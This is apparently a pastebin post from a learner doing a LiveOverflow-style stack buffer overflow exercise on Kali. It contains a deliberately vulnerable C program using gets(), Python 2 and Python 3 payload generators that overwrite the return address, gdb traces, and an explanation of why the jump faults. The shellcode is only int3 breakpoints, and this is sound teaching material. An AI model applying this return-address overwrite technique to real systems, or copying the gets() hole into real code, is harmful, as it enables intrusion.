Live Overflow Doubt

a guest
Jul 7th, 2023
All files used and their contents:
-- exploit_shell.py:
import struct

# 64-byte buffer at rbp-0x40 plus the 8-byte saved rbp: 72 bytes to reach the return address
padding = "A" * 72
# Stack address of the return-address slot seen in gdb, packed as a native 64-bit (little-endian) value.
# Named "eip" after the 32-bit Protostar original; on this x86-64 build it overwrites the saved rip.
eip = struct.pack("Q", 0x7fffffffe248)
# Four int3 (0xCC) breakpoint instructions as a stand-in for shellcode
payload = "\xCC" * 4

# Python 2 print statement: writes the raw string plus a trailing newline
print padding + eip + payload

-- python2 exploit_shell.py:
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAH��������

-- shell_exploit.c (compiled to shell_exploit):
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
#include <string.h>

int main(int argc, char *argv[])
{
    char buffer[64];
    gets(buffer);   /* no length limit: input longer than 64 bytes overwrites the saved rbp and the return address */
}

Name: Intel Core i7 640M Inside
Codename: Arrandale
Package: Socket 989 rPGA

I'm not sure if it's relevant, but I'm not exploiting on Protostar, I'm on a Kali VM.
Can the provided Python 2 payload be transcribed to Python 3? How?

  33.  
DEBUG WITHOUT RUNNING THE PYTHON STDIN PAYLOAD:
┌──(root㉿kali)-[/home/kali]
└─# gdb shell_exploit
GNU gdb (Debian 13.2-1) 13.2
Copyright (C) 2023 Free Software Foundation, Inc.
License GPLv3+: GNU GPL version 3 or later <http://gnu.org/licenses/gpl.html>
This is free software: you are free to change and redistribute it.
There is NO WARRANTY, to the extent permitted by law.
Type "show copying" and "show warranty" for details.
This GDB was configured as "x86_64-linux-gnu".
Type "show configuration" for configuration details.
For bug reporting instructions, please see:
<https://www.gnu.org/software/gdb/bugs/>.
Find the GDB manual and other documentation resources online at:
<http://www.gnu.org/software/gdb/documentation/>.

For help, type "help".
Type "apropos word" to search for commands related to "word"...
Reading symbols from shell_exploit...
(No debugging symbols found in shell_exploit)
(gdb) set disassembly-flavor intel
(gdb) break *main
Breakpoint 1 at 0x1139
(gdb) define hook-stop
Type commands for definition of "hook-stop".
End with a line saying just "end".
>x/1i $rip
>x/8wx $rsp
>end
(gdb) run
Starting program: /home/kali/shell_exploit
[Thread debugging using libthread_db enabled]
Using host libthread_db library "/lib/x86_64-linux-gnu/libthread_db.so.1".
=> 0x555555555139 <main>: push rbp
0x7fffffffe248: 0xf7df218a 0x00007fff 0x00000000 0x00000000
0x7fffffffe258: 0x55555139 0x00005555 0x00000000 0x00000001

Breakpoint 1, 0x0000555555555139 in main ()
(gdb) disassemble
Dump of assembler code for function main:
=> 0x0000555555555139 <+0>: push rbp
   0x000055555555513a <+1>: mov rbp,rsp
   0x000055555555513d <+4>: sub rsp,0x50
   0x0000555555555141 <+8>: mov DWORD PTR [rbp-0x44],edi
   0x0000555555555144 <+11>: mov QWORD PTR [rbp-0x50],rsi
   0x0000555555555148 <+15>: lea rax,[rbp-0x40]
   0x000055555555514c <+19>: mov rdi,rax
   0x000055555555514f <+22>: mov eax,0x0
   0x0000555555555154 <+27>: call 0x555555555030 <gets@plt>
   0x0000555555555159 <+32>: mov eax,0x0
   0x000055555555515e <+37>: leave
   0x000055555555515f <+38>: ret
End of assembler dump.
(gdb) break *0x000055555555515f
Breakpoint 2 at 0x55555555515f
(gdb) continue
Continuing.
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
=> 0x55555555515f <main+38>: ret
0x7fffffffe248: 0x41414141 0x41414141 0x41414141 0x41414141
0x7fffffffe258: 0x41414141 0x41414141 0x41414141 0x41414141

=======================================================================================================================================

DEBUG RUNNING PYTHON STDIN PAYLOAD:
(gdb) r < /home/kali/pl
The program being debugged has been started already.
Start it from the beginning? (y or n) y
Starting program: /home/kali/shell_exploit < /home/kali/pl
[Thread debugging using libthread_db enabled]
Using host libthread_db library "/lib/x86_64-linux-gnu/libthread_db.so.1".
=> 0x555555555139 <main>: push rbp
0x7fffffffe248: 0xf7df218a 0x00007fff 0x00000000 0x00000000
0x7fffffffe258: 0x55555139 0x00005555 0x00000000 0x00000001

Breakpoint 1, 0x0000555555555139 in main ()
(gdb) disassemble
Dump of assembler code for function main:
=> 0x0000555555555139 <+0>: push rbp
   0x000055555555513a <+1>: mov rbp,rsp
   0x000055555555513d <+4>: sub rsp,0x50
   0x0000555555555141 <+8>: mov DWORD PTR [rbp-0x44],edi
   0x0000555555555144 <+11>: mov QWORD PTR [rbp-0x50],rsi
   0x0000555555555148 <+15>: lea rax,[rbp-0x40]
   0x000055555555514c <+19>: mov rdi,rax
   0x000055555555514f <+22>: mov eax,0x0
   0x0000555555555154 <+27>: call 0x555555555030 <gets@plt>
   0x0000555555555159 <+32>: mov eax,0x0
   0x000055555555515e <+37>: leave
   0x000055555555515f <+38>: ret
End of assembler dump.
(gdb) continue
Continuing.
=> 0x55555555515f <main+38>: ret
0x7fffffffe248: 0xffffe248 0x00007fff 0xcccccccc 0x00000000
0x7fffffffe258: 0x55555139 0x00005555 0x00000000 0x00000001

Breakpoint 2, 0x000055555555515f in main ()
(gdb) si
=> 0x7fffffffe248: rex.W loop 0x7fffffffe24a # This returns different registers on new runs, like add and fsub.
0x7fffffffe250: 0xcccccccc 0x00000000 0x55555139 0x00005555
0x7fffffffe260: 0x00000000 0x00000001 0xffffe358 0x00007fff
0x00007fffffffe248 in ?? ()
(gdb) si

Program received signal SIGSEGV, Segmentation fault.
=> 0x7fffffffe248: rex.W loop 0x7fffffffe24a
0x7fffffffe250: 0xcccccccc 0x00000000 0x55555139 0x00005555
0x7fffffffe260: 0x00000000 0x00000001 0xffffe358 0x00007fff
0x00007fffffffe248 in ?? ()
(gdb) si

Program terminated with signal SIGSEGV, Segmentation fault.
The program no longer exists.
Error while running hook_stop:
No registers.

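A Python 3 port of the payload generator, added here as an illustration and not part of the poster's files. In Python 3 the padding, packed address and 0xCC bytes must all be bytes objects, and the result has to go out through sys.stdout.buffer rather than print(), which would encode it as text. The block also makes visible why the traced run faults where it does: the gdb dump at the ret shows the return slot 0x7fffffffe248 holding its own address and the 0xcccccccc int3 bytes at 0x7fffffffe250, so returning to 0x7fffffffe248 makes the CPU decode the address bytes 48 e2 ff ff ff 7f 00 00 as code (48 e2 is exactly the `rex.W loop` gdb printed). The int3 bytes start 8 bytes later, at the slot address plus 8. The constant names, the hypothetical file name exploit3.py, and the newline check are this example's own. Two caveats a practitioner would want: gdb disables ASLR by default, so a stack address read in gdb is only stable under gdb; and a default gcc build on a current Kali has a non-executable stack, so even a correct pointer into the int3 bytes will SIGSEGV on the fetch unless the binary was linked with -z execstack (with an executable stack the int3 would instead raise SIGTRAP).

```python
#!/usr/bin/env python3
# Python 3 port of the post's exploit_shell.py (added example, not the poster's code).
# Changes from the Python 2 version: bytes instead of str, an explicit little-endian
# "<Q" format, and raw bytes written to sys.stdout.buffer instead of print().
import struct
import sys

BUFFER_SIZE = 64                                # char buffer[64], at rbp-0x40 in the disassembly
SAVED_RBP_SIZE = 8                              # saved rbp sits between the buffer and the return address
PADDING_LEN = BUFFER_SIZE + SAVED_RBP_SIZE      # 72, the same padding length the post uses
RET_SLOT = 0x7fffffffe248                       # stack address of the return-address slot (x/8wx $rsp at ret)
INT3_SHELLCODE = b"\xCC" * 4                    # stand-in for shellcode, matching the post: four int3


def build_payload(ret_addr, shellcode, padding_len=PADDING_LEN):
    """Return padding | little-endian 64-bit ret_addr | shellcode, as bytes.

    gets() stops at the first newline, so a 0x0a byte anywhere in the payload
    would truncate it; refuse such payloads instead of emitting a broken one.
    NUL bytes are fine: gets() reads straight through them, which is why the
    two high zero bytes of a canonical user-space address are not a problem.
    """
    payload = b"A" * padding_len + struct.pack("<Q", ret_addr) + shellcode
    if b"\n" in payload:
        raise ValueError("payload contains 0x0a, which gets() treats as end of input")
    return payload


def ret_slot_bytes(payload, padding_len=PADDING_LEN):
    """The 8 bytes that land in the return-address slot.

    If the return address points at the slot itself (as in the post), these are
    the first bytes the CPU fetches as instructions after the ret.
    """
    return payload[padding_len:padding_len + 8]


def shellcode_address(ret_slot):
    """Stack address where the bytes following the 8-byte return slot land."""
    return ret_slot + 8


def main():
    # Rebuild the post's payload and show what the CPU would execute at the slot.
    as_posted = build_payload(RET_SLOT, INT3_SHELLCODE)
    first = ret_slot_bytes(as_posted)
    sys.stderr.write("bytes at the return slot as posted: %s\n" % first.hex(" "))
    sys.stderr.write("(48 e2 decodes as rex.W loop, the instruction gdb showed)\n")

    # Point the return address at the int3 bytes instead: slot address + 8.
    target = shellcode_address(RET_SLOT)
    sys.stderr.write("retargeting return address to 0x%x\n" % target)
    fixed = build_payload(target, INT3_SHELLCODE)

    # Usage (hypothetical file name): python3 exploit3.py > pl ; then in gdb: r < pl
    sys.stdout.buffer.write(fixed)
    sys.stdout.buffer.flush()


if __name__ == "__main__":
    main()
```

The diagnostics go to stderr so that only the raw payload reaches the file redirected from stdout; mixing text and payload on stdout is the Python 3 pitfall this port avoids.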